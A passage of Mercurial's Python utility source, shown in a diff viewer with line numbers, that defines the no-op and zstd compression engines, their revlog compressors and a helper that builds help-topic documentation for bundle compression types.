3583 3585 return 'none', 'UN'
3584 3586
3585 3587 # Clients always support uncompressed payloads. Servers don't because
3586 3588 # unless you are on a fast network, uncompressed payloads can easily
3587 3589 # saturate your network pipe.
3588 3590 def wireprotosupport(self):
3589 3591 return compewireprotosupport('none', 0, 10)
3590 3592
3591 3593 # We don't implement revlogheader because it is handled specially
3592 3594 # in the revlog class.
3593 3595
3594 3596 def compressstream(self, it, opts=None):
3595 3597 return it
3596 3598
3597 3599 def decompressorreader(self, fh):
3598 3600 return fh
3599 3601
3600 3602 class nooprevlogcompressor(object):
3601 3603 def compress(self, data):
3602 3604 return None
3603 3605
3604 3606 def revlogcompressor(self, opts=None):
3605 3607 return self.nooprevlogcompressor()
3606 3608
3607 3609 compengines.register(_noopengine())
3608 3610
3609 3611 class _zstdengine(compressionengine):
3610 3612 def name(self):
3611 3613 return 'zstd'
3612 3614
3613 3615 @propertycache
3614 3616 def _module(self):
3615 3617 # Not all installs have the zstd module available. So defer importing
3616 3618 # until first access.
3617 3619 try:
3618 3620 from . import zstd
3619 3621 # Force delayed import.
3620 3622 zstd.__version__
3621 3623 return zstd
3622 3624 except ImportError:
3623 3625 return None
3624 3626
3625 3627 def available(self):
3626 3628 return bool(self._module)
3627 3629
3628 3630 def bundletype(self):
3629 3631 """A modern compression algorithm that is fast and highly flexible.
3630 3632
3631 3633 Only supported by Mercurial 4.1 and newer clients.
3632 3634
3633 3635 With the default settings, zstd compression is both faster and yields
3634 3636 better compression than ``gzip``. It also frequently yields better
3635 3637 compression than ``bzip2`` while operating at much higher speeds.
3636 3638
3637 3639 If this engine is available and backwards compatibility is not a
3638 3640 concern, it is likely the best available engine.
3639 3641 """
3640 3642 return 'zstd', 'ZS'
3641 3643
3642 3644 def wireprotosupport(self):
3643 3645 return compewireprotosupport('zstd', 50, 50)
3644 3646
3645 3647 def revlogheader(self):
3646 3648 return '\x28'
3647 3649
3648 3650 def compressstream(self, it, opts=None):
3649 3651 opts = opts or {}
3650 3652 # zstd level 3 is almost always significantly faster than zlib
3651 3653 # while providing no worse compression. It strikes a good balance
3652 3654 # between speed and compression.
3653 3655 level = opts.get('level', 3)
3654 3656
3655 3657 zstd = self._module
3656 3658 z = zstd.ZstdCompressor(level=level).compressobj()
3657 3659 for chunk in it:
3658 3660 data = z.compress(chunk)
3659 3661 if data:
3660 3662 yield data
3661 3663
3662 3664 yield z.flush()
3663 3665
3664 3666 def decompressorreader(self, fh):
3665 3667 zstd = self._module
3666 3668 dctx = zstd.ZstdDecompressor()
3667 3669 return chunkbuffer(dctx.read_from(fh))
3668 3670
3669 3671 class zstdrevlogcompressor(object):
3670 3672 def __init__(self, zstd, level=3):
3671 3673 # Writing the content size adds a few bytes to the output. However,
3672 3674 # it allows decompression to be more optimal since we can
3673 3675 # pre-allocate a buffer to hold the result.
3674 3676 self._cctx = zstd.ZstdCompressor(level=level,
3675 3677 write_content_size=True)
3676 3678 self._dctx = zstd.ZstdDecompressor()
3677 3679 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3678 3680 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3679 3681
3680 3682 def compress(self, data):
3681 3683 insize = len(data)
3682 3684 # Caller handles empty input case.
3683 3685 assert insize > 0
3684 3686
3685 3687 if insize < 50:
3686 3688 return None
3687 3689
3688 3690 elif insize <= 1000000:
3689 3691 compressed = self._cctx.compress(data)
3690 3692 if len(compressed) < insize:
3691 3693 return compressed
3692 3694 return None
3693 3695 else:
3694 3696 z = self._cctx.compressobj()
3695 3697 chunks = []
3696 3698 pos = 0
3697 3699 while pos < insize:
3698 3700 pos2 = pos + self._compinsize
3699 3701 chunk = z.compress(data[pos:pos2])
3700 3702 if chunk:
3701 3703 chunks.append(chunk)
3702 3704 pos = pos2
3703 3705 chunks.append(z.flush())
3704 3706
3705 3707 if sum(map(len, chunks)) < insize:
3706 3708 return ''.join(chunks)
3707 3709 return None
3708 3710
3709 3711 def decompress(self, data):
3710 3712 insize = len(data)
3711 3713
3712 3714 try:
3713 3715 # This was measured to be faster than other streaming
3714 3716 # decompressors.
3715 3717 dobj = self._dctx.decompressobj()
3716 3718 chunks = []
3717 3719 pos = 0
3718 3720 while pos < insize:
3719 3721 pos2 = pos + self._decompinsize
3720 3722 chunk = dobj.decompress(data[pos:pos2])
3721 3723 if chunk:
3722 3724 chunks.append(chunk)
3723 3725 pos = pos2
3724 3726 # Frame should be exhausted, so no finish() API.
3725 3727
3726 3728 return ''.join(chunks)
3727 3729 except Exception as e:
3728 3730 raise error.RevlogError(_('revlog decompress error: %s') %
3729 3731 str(e))
3730 3732
3731 3733 def revlogcompressor(self, opts=None):
3732 3734 opts = opts or {}
3733 3735 return self.zstdrevlogcompressor(self._module,
3734 3736 level=opts.get('level', 3))
3735 3737
3736 3738 compengines.register(_zstdengine())
3737 3739
3738 3740 def bundlecompressiontopics():
3739 3741 """Obtains a list of available bundle compressions for use in help."""
3740 3742 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3741 3743 items = {}
3742 3744
3743 3745 # We need to format the docstring. So use a dummy object/type to hold it
3744 3746 # rather than mutating the original.
3745 3747 class docobject(object):
3746 3748 pass
3747 3749
3748 3750 for name in compengines:
3749 3751 engine = compengines[name]
3750 3752
3751 3753 if not engine.available():
3752 3754 continue
3753 3755
3754 3756 bt = engine.bundletype()
3755 3757 if not bt or not bt[0]:
3756 3758 continue
3757 3759
3758 3760 doc = pycompat.sysstr('``%s``\n %s') % (
3759 3761 bt[0], engine.bundletype.__doc__)
3760 3762
3761 3763 value = docobject()
3762 3764 value.__doc__ = doc
3763 3765 value._origdoc = engine.bundletype.__doc__
3764 3766 value._origfunc = engine.bundletype
3765 3767
3766 3768 items[bt[0]] = value
3767 3769
3768 3770 return items
3769 3771
3770 3772 i18nfunctions = bundlecompressiontopics().values()
3771 3773
3772 3774 # convenient shortcut
3773 3775 dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now